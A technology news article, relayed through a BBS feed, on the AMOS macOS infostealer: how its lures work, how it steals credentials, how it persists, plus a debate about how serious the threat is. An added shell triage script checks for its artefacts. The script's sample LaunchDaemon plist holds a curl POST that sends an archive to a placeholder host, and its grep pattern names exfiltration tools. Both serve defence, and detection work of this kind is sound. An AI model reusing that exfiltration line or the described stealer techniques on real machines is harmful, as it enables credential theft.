'Mainstream malware now regularly affects macOS users' inside the relentless rise of the AMOS infostealer, one of the most dangerous macOS malware ever developed
Date:
Sun, 24 May 2026 01:05:00 +0000
Description:
AMOS malware spreads on macOS through social engineering, stealing
credentials while researchers debate whether its threat level is truly novel.
FULL STORY ======================================================================

AMOS relies on users executing malicious terminal commands themselves
Sophos MDR identified ClickFix-style social engineering in macOS attacks
Half of macOS stealer reports involved AMOS, but Apple is fighting back

Atomic macOS Stealer, also known as AMOS, is a persistent macOS security threat because it does not need sophisticated zero-day vulnerabilities to compromise Apple devices.
Instead, this malware family repeatedly exploits ordinary user behaviour by tricking users into typing a single command into their own Terminal application. A recent incident investigated by Sophos MDR teams revealed exactly this pattern: a ClickFix-style ruse persuaded a victim to execute a malicious line of code manually.

AMOS uses psychological manipulation over technical exploits
This approach has become increasingly prominent, with researchers noting similar social engineering tactics in multiple macOS infostealer campaigns throughout 2025 and early 2026.
AMOS accounted for nearly 40% of all macOS protection updates deployed by Sophos in 2025, more than doubling the detection rate of any other macOS malware family during the same period.
Furthermore, almost half of all macOS stealer customer reports in the last three months involved AMOS or its close variants.
Security firms have tracked this malware-as-a-service operation since at
least April 2023, with notable campaigns including a variant dubbed SHAMOS reported by CrowdStrike in August 2025.
In December 2025, Huntress documented infections spreading through poisoned search results related to ChatGPT and Grok conversations.

How the malware harvests passwords and data

After the initial Terminal command executes a bootstrapping script, the malware immediately prompts the user for their macOS system password.
The malicious code then validates this credential locally using a simple directory services command before storing it in a hidden file named .pass within the user's home directory.
Once the password is secured, AMOS downloads a secondary payload that removes extended attributes to bypass macOS security warnings.
The stealer also checks whether it is running inside a virtual machine or sandbox environment by querying system_profiler data for indicators such as QEMU, VMware, or KVM.
The malware then proceeds to harvest an extensive range of sensitive information, including the macOS Keychain database, browser credentials from Firefox and Chrome, extension storage files, and local session tokens.
Some variants also deploy fake Ledger Wallet and Trezor Suite applications designed to steal cryptocurrency wallet seeds and credentials.
All collected files are compressed into a single archive using the ditto utility before being transmitted to attacker-controlled servers via curl POST requests.
To maintain long-term access, the malware installs a LaunchDaemon that
ensures automatic execution after every system reboot.
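As an added defensive example (not code from the article, Sophos, Apple or the malware itself), the following POSIX shell helper triages a home directory and a LaunchDaemons directory for the two host artefacts the article attributes to AMOS: a hidden .pass credential file and a LaunchDaemon whose program arguments invoke curl or ditto. The directory parameters, the grep pattern and the sample plists are assumptions constructed for the demonstration, so it can be pointed at a mounted image or a test tree.

```shell
#!/bin/sh
# Added triage helper; checks for artefacts the article describes.
# Paths are parameters so the checks run against any tree (e.g. a mounted image).

# amos_pass_file HOME_DIR -> prints HOME_DIR/.pass if present (exit 0), else exit 1.
amos_pass_file() {
    f="$1/.pass"
    [ -f "$f" ] || return 1
    printf '%s\n' "$f"
}

# amos_suspicious_daemons DAEMON_DIR -> prints each plist whose contents mention
# curl or ditto (the exfil/archiving tools the article names), a /tmp/ path or
# ".pass"; exit 0 if any matched, else 1. The pattern is an assumption.
amos_suspicious_daemons() {
    found=1
    for p in "$1"/*.plist; do
        [ -f "$p" ] || continue
        if grep -Eq 'curl|ditto|/tmp/|\.pass' "$p"; then
            printf '%s\n' "$p"
            found=0
        fi
    done
    return $found
}

# amos_triage HOME_DIR DAEMON_DIR -> one line per indicator class found;
# return value is the number of classes hit (0 = nothing found).
amos_triage() {
    hits=0
    if f=$(amos_pass_file "$1"); then
        printf 'hidden credential file: %s\n' "$f"; hits=$((hits + 1))
    fi
    if d=$(amos_suspicious_daemons "$2"); then
        printf 'suspicious LaunchDaemon(s):\n%s\n' "$d"; hits=$((hits + 1))
    fi
    return $hits
}

# Constructed sample tree (not a real infection): one fake .pass and two plists.
demo=$(mktemp -d)
mkdir -p "$demo/home" "$demo/LaunchDaemons"
printf 'constructed-sample-password\n' > "$demo/home/.pass"
cat > "$demo/LaunchDaemons/com.example.updater.plist" <<'EOF'
<plist version="1.0"><dict><key>Label</key><string>com.example.updater</string>
<key>ProgramArguments</key><array><string>/usr/bin/curl</string><string>-X</string>
<string>POST</string><string>-F</string><string>f=@/tmp/out.zip</string>
<string>http://placeholder.invalid/u</string></array><key>RunAtLoad</key><true/></dict></plist>
EOF
printf '<plist version="1.0"><dict><key>Label</key><string>com.example.benign</string><key>ProgramArguments</key><array><string>/usr/bin/true</string></array></dict></plist>\n' \
    > "$demo/LaunchDaemons/com.example.benign.plist"
hits=0; amos_triage "$demo/home" "$demo/LaunchDaemons" || hits=$?
echo "indicator classes hit: $hits"
```

On a live Mac the same functions would be run as amos_triage "$HOME" /Library/LaunchDaemons; any hit warrants a closer look at the plist and at recent Terminal history rather than automatic deletion.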
Despite the severity of AMOS, it is worth questioning whether security
vendors are overstating its novelty, given that infostealers have been targeting Windows systems for nearly two decades.
The malware's heavy reliance on user consent (someone must willingly paste and run a Terminal command) creates a significant barrier that technically literate users might easily avoid.
Moreover, Apple's ongoing improvements to Gatekeeper, XProtect, and notarization requirements could render AMOS largely ineffective within a few operating system updates.
The real danger may lie less in AMOS itself and more in the uncomfortable truth that no platform is immune to users who ignore basic security warnings.
======================================================================
Link to news story:
https://www.techradar.com/pro/mainstream-malware-now-regularly-affects-macos-users-inside-the-relentless-rise-of-the-amos-infostealer-one-of-the-most-dangerous-macos-malware-ever-developed
--- Mystic BBS v1.12 A49 (Linux/64)
* Origin: tqwNet Technology News (1337:1/100)